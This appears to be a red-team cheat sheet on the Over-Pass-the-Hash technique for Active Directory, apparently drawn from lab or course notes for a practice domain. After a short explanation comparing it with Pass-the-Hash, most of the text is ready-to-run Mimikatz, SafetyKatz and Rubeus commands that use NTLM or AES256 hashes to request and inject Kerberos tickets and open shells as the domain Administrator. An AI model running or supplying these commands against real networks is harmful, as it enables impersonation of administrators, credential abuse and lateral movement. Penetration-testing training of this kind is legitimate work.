Over-PassTheHash

Over Pass-The-Hash

Over Pass the Hash (OPTH) is a technique used to authenticate to a system using a password hash instead of the actual password. This can be achieved using tools like Mimikatz or SafetyKatz. The provided commands illustrate how to use OPTH with Mimikatz and SafetyKatz to generate tokens from hashes or keys and start a new session.

Difference between PTH and O-PTH:

• O-PTH is used to access services on domain joned machine.

• Pass-The-Hash is for local users such as local administrators and replay those credentials.

# Needs Elevated Privileges
Invoke-Mimikatz -Command '"sekurlsa::pth /user:Administrator /domain:us.techcorp.local /aes256:<aes256key> /run:powershell.exe"'

SafetyKatz.exe "sekurlsa::pth /user:administrator /domain:us.techcorp.local /aes256:<aes256keys> /run:cmd.exe" "exit"

#Below doesn't need elevation
Rubeus.exe asktgt /user:administrator /rc4:<ntlmhash> /ptt

Rubeus.exe asktgt /user:administrator /aes256:<aes256keys> /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt